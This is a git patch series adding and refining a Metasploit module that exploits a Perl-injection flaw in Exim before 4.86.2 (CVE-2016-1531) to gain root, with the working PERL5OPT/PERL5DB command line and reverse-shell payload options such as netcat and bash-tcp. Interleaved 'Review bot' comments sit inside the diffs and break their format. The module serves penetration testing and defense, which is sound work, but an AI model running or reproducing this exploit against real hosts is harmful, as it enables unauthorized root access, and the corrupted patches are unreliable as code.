From 43e74fce9e65dc6dff7cfedbb116a066bffc752e Mon Sep 17 00:00:00 2001
From: William Vu
Date: Mon, 4 Apr 2016 23:37:09 -0500
Subject: [PATCH 1/5] Add Exim privesc

---
 .../exploits/unix/local/exim_perl_startup.rb | 63 +++++++++++++++++++
 1 file changed, 63 insertions(+)
 create mode 100644 modules/exploits/unix/local/exim_perl_startup.rb

diff --git a/modules/exploits/unix/local/exim_perl_startup.rb b/modules/exploits/unix/local/exim_perl_startup.rb
new file mode 100644
index 0000000000..26c2d0db72
--- /dev/null
+++ b/modules/exploits/unix/local/exim_perl_startup.rb
@@ -0,0 +1,63 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+
+ Rank = ExcellentRanking
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Exim "perl_startup" Privilege Escalation',
+ 'Description' => %q{
+ This module exploits a Perl injection vulnerability in Exim < 4.86.2
+ given the presence of the "perl_startup" configuration parameter.
+ },
+ 'Author' => [
+ 'Dawid Golunski', # Vulnerability discovery
+ 'wvu' # Metasploit module
+ ],
+ 'References' => [
+ ['CVE', '2016-1531'],
+ ['EDB', '39549'],
+ ['URL', 'http://www.exim.org/static/doc/CVE-2016-1531.txt']
+ ],
+ 'DisclosureDate' => 'Mar 10 2016',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'SessionTypes' => ['shell', 'meterpreter'],
+ 'Privileged' => true,
+ 'Payload' => {
+ 'BadChars' => "\x22\x27", # " and '
+ 'Compat' => {
+ 'PayloadType' => 'cmd cmd_bash',
+ 'RequiredCmd' => 'generic netcat netcat-e bash-tcp'
+ }
+ },
+ 'Targets' => [
+ ['Exim < 4.86.2', {}]
+ ],
+ 'DefaultTarget' => 0
+ ))
+ end
+
+ def check
+ if x('whoami') == 'root'
+ CheckCode::Vulnerable
+ else
+ CheckCode::Safe
+ end
+ end
+
+ def exploit
+ x(payload.encoded)
+ end
+
+ def x(c)
+ # PERL5DB technique from http://perldoc.perl.org/perlrun.html
+ cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "#{c}"' exim -ps 2>&-})
+ end
+
+end

From 07ee18a62b890e567afea40ad75ecad8b1294f1d Mon Sep 17 00:00:00 2001
From: William Vu
Date: Wed, 13 Apr 2016 18:12:43 -0500
Subject: [PATCH 2/5] Do something shady with the exploit method

Hat tip @acammack-r7.

---
 modules/exploits/unix/local/exim_perl_startup.rb | 8 ++------
 1 file changed, 2 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/unix/local/exim_perl_startup.rb b/modules/exploits/unix/local/exim_perl_startup.rb
index 26c2d0db72..12c378f35d 100644
--- a/modules/exploits/unix/local/exim_perl_startup.rb
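Review bot: `check` maps every output other than the exact string `root` to `CheckCode::Safe`, including an empty string, so a host where `exim` is not on the PATH (or where the command fails for any other reason) is reported as confirmed not vulnerable rather than undetermined, and because `2>&-` closes stderr there is no trace of why. Returning `CheckCode::Unknown` when `x('whoami')` yields an empty string and logging the raw output with `vprint_status` before the comparison would make a negative result trustworthy; if `cmd_exec` leaves a trailing newline on this session type, the exact `== 'root'` comparison also needs a `.strip` (I cannot tell from here). The same comparison survives patch 2/5 as `if exploit('whoami') == 'root'`, so the fix applies there too. The `# " and '` comment on `'BadChars'` would help a later maintainer more as `# " and ': the command is embedded in a Perl double-quoted string inside a shell single-quoted one`, which is why exactly those two bytes are excluded.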
+++ b/modules/exploits/unix/local/exim_perl_startup.rb
@@ -44,18 +44,14 @@ class MetasploitModule < Msf::Exploit::Local
 end
 
 def check
- if x('whoami') == 'root'
+ if exploit('whoami') == 'root'
 CheckCode::Vulnerable
 else
 CheckCode::Safe
 end
 end
 
- def exploit
- x(payload.encoded)
- end
-
- def x(c)
+ def exploit(c = payload.encoded)
 # PERL5DB technique from http://perldoc.perl.org/perlrun.html
 cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "#{c}"' exim -ps 2>&-})
 end

From f8e4253e2f44c57eea53db285ab8686e8142894a Mon Sep 17 00:00:00 2001
From: William Vu
Date: Wed, 13 Apr 2016 18:22:28 -0500
Subject: [PATCH 3/5] Add telnet to RequiredCmd

Baffles me that cmd/unix/reverse isn't cmd/unix/reverse_telnet.

---
 modules/exploits/unix/local/exim_perl_startup.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/unix/local/exim_perl_startup.rb b/modules/exploits/unix/local/exim_perl_startup.rb
index 12c378f35d..6469afb202 100644
--- a/modules/exploits/unix/local/exim_perl_startup.rb
+++ b/modules/exploits/unix/local/exim_perl_startup.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Local
 'BadChars' => "\x22\x27", # " and '
 'Compat' => {
 'PayloadType' => 'cmd cmd_bash',
- 'RequiredCmd' => 'generic netcat netcat-e bash-tcp'
+ 'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet'
 }
 },
 'Targets' => [

From de004d7da3259ab2e626d7c7144b2859f2f6795e Mon Sep 17 00:00:00 2001
From: William Vu
Date: Wed, 13 Apr 2016 19:32:20 -0500
Subject: [PATCH 4/5] Line up some hash rockets

---
 .../exploits/unix/local/exim_perl_startup.rb | 30 +++++++++----------
 1 file changed, 15 insertions(+), 15 deletions(-)

diff --git a/modules/exploits/unix/local/exim_perl_startup.rb b/modules/exploits/unix/local/exim_perl_startup.rb
index 6469afb202..3b91474a3d 100644
--- a/modules/exploits/unix/local/exim_perl_startup.rb
+++ b/modules/exploits/unix/local/exim_perl_startup.rb
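Review bot: Giving the framework's `exploit` entry point an optional parameter so that `check` can call `exploit('whoami')` ties the two lifecycle methods together: a reader, and the framework itself, expects `exploit` to take no arguments and to deliver the payload, and now a call to `check` is literally a call to `exploit` with a different command. A clearer shape is to keep `def exploit` argument-free and delegate to a private helper, say `run_cmd(cmd)`, that owns the `cmd_exec(%Q{...})` line and the `# PERL5DB technique ...` comment, with `check` calling that helper instead. Either way `check` executes a command through the vulnerable path, so a `print_warning` saying so before it runs would be appropriate. The enclosing class `MetasploitModule` starts and ends outside this hunk.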
@@ -9,37 +9,37 @@ class MetasploitModule < Msf::Exploit::Local
 
 def initialize(info = {})
 super(update_info(info,
- 'Name' => 'Exim "perl_startup" Privilege Escalation',
- 'Description' => %q{
+ 'Name' => 'Exim "perl_startup" Privilege Escalation',
+ 'Description' => %q{
 This module exploits a Perl injection vulnerability in Exim < 4.86.2
 given the presence of the "perl_startup" configuration parameter.
 },
- 'Author' => [
+ 'Author' => [
 'Dawid Golunski', # Vulnerability discovery
 'wvu' # Metasploit module
 ],
- 'References' => [
+ 'References' => [
 ['CVE', '2016-1531'],
 ['EDB', '39549'],
 ['URL', 'http://www.exim.org/static/doc/CVE-2016-1531.txt']
 ],
- 'DisclosureDate' => 'Mar 10 2016',
- 'License' => MSF_LICENSE,
- 'Platform' => 'unix',
- 'Arch' => ARCH_CMD,
- 'SessionTypes' => ['shell', 'meterpreter'],
- 'Privileged' => true,
- 'Payload' => {
- 'BadChars' => "\x22\x27", # " and '
- 'Compat' => {
+ 'DisclosureDate' => 'Mar 10 2016',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'SessionTypes' => ['shell', 'meterpreter'],
+ 'Privileged' => true,
+ 'Payload' => {
+ 'BadChars' => "\x22\x27", # " and '
+ 'Compat' => {
 'PayloadType' => 'cmd cmd_bash',
 'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet'
 }
 },
- 'Targets' => [
+ 'Targets' => [
 ['Exim < 4.86.2', {}]
 ],
- 'DefaultTarget' => 0
+ 'DefaultTarget' => 0
 ))
 end
 

From 252632a8026e4deeacba0fd864fb4bfcdab46788 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Wed, 13 Apr 2016 19:38:27 -0500
Subject: [PATCH 5/5] Use %w{} for a couple things

Why not? :)

---
 modules/exploits/unix/local/exim_perl_startup.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/unix/local/exim_perl_startup.rb b/modules/exploits/unix/local/exim_perl_startup.rb
index 3b91474a3d..062190d860 100644
--- a/modules/exploits/unix/local/exim_perl_startup.rb
+++ b/modules/exploits/unix/local/exim_perl_startup.rb
@@ -19,15 +19,15 @@ class MetasploitModule < Msf::Exploit::Local
 'wvu' # Metasploit module
 ],
 'References' => [
- ['CVE', '2016-1531'],
- ['EDB', '39549'],
- ['URL', 'http://www.exim.org/static/doc/CVE-2016-1531.txt']
+ %w{CVE 2016-1531},
+ %w{EDB 39549},
+ %w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt}
 ],
 'DisclosureDate' => 'Mar 10 2016',
 'License' => MSF_LICENSE,
 'Platform' => 'unix',
 'Arch' => ARCH_CMD,
- 'SessionTypes' => ['shell', 'meterpreter'],
+ 'SessionTypes' => %w{shell meterpreter},
 'Privileged' => true,
 'Payload' => {
 'BadChars' => "\x22\x27", # " and '